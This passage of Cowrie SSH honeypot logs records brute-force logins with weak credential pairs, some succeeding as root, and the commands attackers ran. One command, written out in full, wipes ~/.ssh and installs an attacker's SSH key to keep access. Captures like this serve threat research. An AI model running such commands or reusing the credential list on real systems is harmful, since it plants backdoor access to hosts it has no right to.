{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:14:39.757544Z","src_ip":"134.199.174.250","session":"e0cbb3acb6cc"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123","message":"login attempt [guest/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:14:40.697085Z","src_ip":"134.199.174.250","session":"e0cbb3acb6cc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:41.995098Z","src_ip":"134.199.174.250","session":"e0cbb3acb6cc"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":46948,"dst_ip":"1.2.3.4","dst_port":22,"session":"b49a5b5c4769","protocol":"ssh","message":"New connection: 139.59.14.27:46948 (1.2.3.4:22) [session: b49a5b5c4769]","sensor":"my-vps","timestamp":"2025-09-08T13:14:44.608372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:14:44.609325Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47618,"dst_ip":"1.2.3.4","dst_port":22,"session":"48dd2a2cdfcc","protocol":"ssh","message":"New connection: 212.227.235.229:47618 (1.2.3.4:22) [session: 48dd2a2cdfcc]","sensor":"my-vps","timestamp":"2025-09-08T13:14:44.823700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:14:44.824419Z","src_ip":"212.227.235.229","session":"48dd2a2cdfcc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:14:44.930595Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:14:45.175113Z","src_ip":"212.227.235.229","session":"48dd2a2cdfcc"}
{"eventid":"cowrie.login.success","username":"root","password":"user","message":"login attempt [root/user] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:14:46.261398Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.login.failed","username":"vncuser","password":"vncuser@2025","message":"login attempt [vncuser/vncuser@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:14:46.752550Z","src_ip":"212.227.235.229","session":"48dd2a2cdfcc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:14:46.976810Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:14:46.977572Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:14:46.978404Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:47.301254Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:14:47.963868Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:14:47.964781Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:48.132287Z","src_ip":"212.227.235.229","session":"48dd2a2cdfcc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:14:48.289293Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:48.290097Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":46952,"dst_ip":"1.2.3.4","dst_port":22,"session":"b94dd145a889","protocol":"ssh","message":"New connection: 139.59.14.27:46952 (1.2.3.4:22) [session: b94dd145a889]","sensor":"my-vps","timestamp":"2025-09-08T13:14:48.677703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:14:48.678620Z","src_ip":"139.59.14.27","session":"b94dd145a889"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:14:49.041951Z","src_ip":"139.59.14.27","session":"b94dd145a889"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:14:50.547339Z","src_ip":"139.59.14.27","session":"b94dd145a889"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:51.899362Z","src_ip":"139.59.14.27","session":"b94dd145a889"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":42266,"dst_ip":"1.2.3.4","dst_port":22,"session":"779ad0f26973","protocol":"ssh","message":"New connection: 139.59.14.27:42266 (1.2.3.4:22) [session: 779ad0f26973]","sensor":"my-vps","timestamp":"2025-09-08T13:14:52.229924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:14:52.230656Z","src_ip":"139.59.14.27","session":"779ad0f26973"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:14:52.571051Z","src_ip":"139.59.14.27","session":"779ad0f26973"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:14:53.974092Z","src_ip":"139.59.14.27","session":"779ad0f26973"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:54.292422Z","src_ip":"139.59.14.27","session":"b49a5b5c4769"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:14:54.315255Z","src_ip":"139.59.14.27","session":"779ad0f26973"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39222,"dst_ip":"1.2.3.4","dst_port":22,"session":"029cca99981a","protocol":"ssh","message":"New connection: 134.199.174.250:39222 (1.2.3.4:22) [session: 029cca99981a]","sensor":"my-vps","timestamp":"2025-09-08T13:15:11.747596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:15:11.783752Z","src_ip":"134.199.174.250","session":"029cca99981a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:15:12.074587Z","src_ip":"134.199.174.250","session":"029cca99981a"}
{"eventid":"cowrie.login.failed","username":"guest","password":"qwerty123","message":"login attempt [guest/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:15:13.507430Z","src_ip":"134.199.174.250","session":"029cca99981a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:15:14.837001Z","src_ip":"134.199.174.250","session":"029cca99981a"}
{"eventid":"cowrie.session.connect","src_ip":"117.72.74.154","src_port":57464,"dst_ip":"1.2.3.4","dst_port":22,"session":"857ab607c43c","protocol":"ssh","message":"New connection: 117.72.74.154:57464 (1.2.3.4:22) [session: 857ab607c43c]","sensor":"my-vps","timestamp":"2025-09-08T13:15:34.743981Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":51298,"dst_ip":"1.2.3.4","dst_port":22,"session":"03c4ac97f0d9","protocol":"ssh","message":"New connection: 134.199.174.250:51298 (1.2.3.4:22) [session: 03c4ac97f0d9]","sensor":"my-vps","timestamp":"2025-09-08T13:15:42.821339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:15:42.822231Z","src_ip":"134.199.174.250","session":"03c4ac97f0d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:15:43.233457Z","src_ip":"134.199.174.250","session":"03c4ac97f0d9"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1q2w3e4r","message":"login attempt [guest/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:15:44.248562Z","src_ip":"134.199.174.250","session":"03c4ac97f0d9"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:15:45.577936Z","src_ip":"134.199.174.250","session":"03c4ac97f0d9"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":35914,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd83ef744111","protocol":"ssh","message":"New connection: 134.199.174.250:35914 (1.2.3.4:22) [session: fd83ef744111]","sensor":"my-vps","timestamp":"2025-09-08T13:16:13.345423Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:16:13.347169Z","src_ip":"134.199.174.250","session":"fd83ef744111"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:16:13.772803Z","src_ip":"134.199.174.250","session":"fd83ef744111"}
{"eventid":"cowrie.login.failed","username":"guest","password":"pass123","message":"login attempt [guest/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:16:14.556632Z","src_ip":"134.199.174.250","session":"fd83ef744111"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:16:15.818118Z","src_ip":"134.199.174.250","session":"fd83ef744111"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":52664,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dfc41f809eb","protocol":"ssh","message":"New connection: 139.59.14.27:52664 (1.2.3.4:22) [session: 2dfc41f809eb]","sensor":"my-vps","timestamp":"2025-09-08T13:16:24.160210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:16:24.160944Z","src_ip":"139.59.14.27","session":"2dfc41f809eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message"